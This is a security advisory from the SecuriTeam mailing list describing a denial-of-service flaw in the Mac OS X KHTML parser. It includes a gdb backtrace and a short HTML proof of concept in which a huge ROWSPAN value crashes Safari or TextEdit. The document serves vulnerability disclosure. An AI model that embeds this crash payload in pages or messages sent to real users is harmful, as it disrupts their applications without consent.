[NEWS] Mac OS X KHTMLParser DoS



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Mac OS X KHTMLParser DoS
------------------------------------------------------------------------


SUMMARY

A denial of service vulnerability exists within the KHTMLParser on Apple
OS X that allows an attacker to cause the application which uses this
class to crash the application.

DETAILS

Vulnerable Systems:
* Apple OS X version 10.4.3 and prior

When running a specially crafted .html file, the
khtml::RenderTableSection::ensureRows inproperly parsers the data and
causes the crash. The KTHML parser attempts to resize an internal array to
the number of elements indicated by the rowspan value. If the value is
very large, it is not possible to resize the array and the application
quits. On a default install of Apple OS X, Safari and TextEdit are
vulnerable.

Below the crash is triggered using Safari on OS X 10.4.3 within gdb:
Program received signal SIGABRT, Aborted.
0x9004716c in kill ()
(gdb) bt
#0 0x9004716c in kill ()
#1 0x90128b98 in abort ()
#2 0x95dcd974 in khtml::sYSMALLOc () <(=-- Is called because of
sYSMALLOc(1234567890)
#3 0x95dce1a4 in khtml::main_thread_realloc ()
#4 0x95bc0d64 in KWQArrayImpl::resize ()
#5 0x95c05428 in khtml::RenderTableSection::ensureRows ()
#6 0x95c0784c in khtml::RenderTableSection::addCell ()
#7 0x95c076ac in khtml::RenderTableRow::addChild ()
#8 0x95bcb2d8 in DOM::NodeImpl::createRendererIfNeeded ()
#9 0x95bcb1c4 in DOM::ElementImpl::attach ()
#10 0x95bca254 in KHTMLParser::insertNode ()
#11 0x95bcadd8 in KHTMLParser::insertNode ()
#12 0x95bcadd8 in KHTMLParser::insertNode ()
#13 0x95bc83fc in KHTMLParser::parseToken ()
#14 0x95bc54a4 in khtml::HTMLTokenizer::processToken ()
#15 0x95bc6e08 in khtml::HTMLTokenizer::parseTag ()
#16 0x95bc4d24 in khtml::HTMLTokenizer::write ()
#17 0x95bc038c in KHTMLPart::write ()
#18 0x959b510c in -[WebDataSource(WebPrivate) _commitLoadWithData:] ()
#19 0x9598165c in -[WebMainResourceClient addData:] ()
#20 0x95981588 in -[WebBaseResourceHandleDelegate
didReceiveData:lengthReceived:] ()
#21 0x959db930 in -[WebMainResourceClient didReceiveData:lengthReceived:]
()
#22 0x95981524 in -[WebBaseResourceHandleDelegate
connection:didReceiveData:lengthReceived:] ()
#23 0x92910a64 in -[NSURLConnection(NSURLConnectionInternal)
_sendDidReceiveDataCallback] ()
#24 0x9290ef04 in -[NSURLConnection(NSURLConnectionInternal)
_sendCallbacks] ()
#25 0x9290eca0 in _sendCallbacks ()
#26 0x9075db20 in __CFRunLoopDoSources0 ()
#27 0x9075cf98 in __CFRunLoopRun ()
#28 0x9075ca18 in CFRunLoopRunSpecific ()
#29 0x931861e0 in RunCurrentEventLoopInMode ()
#30 0x931857ec in ReceiveNextEventCommon ()
#31 0x931856e0 in BlockUntilNextEventMatchingListInMode ()
#32 0x93683904 in _DPSNextEvent ()
#33 0x936835c8 in -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] ()
#34 0x00007910 in ?? ()
#35 0x9367fb0c in -[NSApplication run] ()
#36 0x93770618 in NSApplicationMain ()
#37 0x0000307c in ?? ()
#38 0x00057758 in ?? ()

The following HTML code will trigger the crash.
You can test this out using Safari, or TextEdit:
<TABLE WIDTH=" >
<" >
onLoad=() STYLE=
<SPAN= STYLE= >
<TD STYLE=^ ROWSPAN=1234567890 >

Or access the following URL:
<http://www.security-protocols.com/poc/sp-x22.html>
http://www.security-protocols.com/poc/sp-x22.html


ADDITIONAL INFORMATION

The original article can be found at:
<http://www.security-protocols.com/advisory/sp-x22-advisory.txt>
http://www.security-protocols.com/advisory/sp-x22-advisory.txt
The information has been provided by
<mailto:tommy@xxxxxxxxxxxxxxxxxxxxxx> Tom Ferris.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Internet Explorers Image Decoder Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... a potential remote code execution path in Microsoft Internet Explorer, ... MSIE performed admirably compared to other browsers (although ... Several MSIE crash sample files from that 30-minute run are available at: ...
    (Securiteam)
  • [NEWS] IBM Lotus Domino Server Web Service DoS Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lotus Domino Server web service allows attackers to crash the service, ... This results in the immediate crash of nHTTP.EXE and is not reported to ... Exploitation of this vulnerability allows unauthenticated remote attackers ...
    (Securiteam)
  • [NEWS] Sun JDK Image Parsing Library Vulnerabilities (More ICC Parsing)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Sun JDK Image Parsing Library Vulnerabilities ... It causes a crash of the ...
    (Securiteam)
  • [NEWS] Apple Mac OS X Safari 2.0.3 DoS (Large ROWSPAN)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Apple Mac OS X Safari 2.0.3 DoS ... developed by Apple and available as part of the Mac OS X operating system. ...
    (Securiteam)
  • [NT] Microsoft IE Recursive Scripting, Embedded Files, window() and Restricted Sites DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer, exploiting these vulnerabilities allows ... malicious attacker to crash a vulnerable browser. ... The bug occurs, ...
    (Securiteam)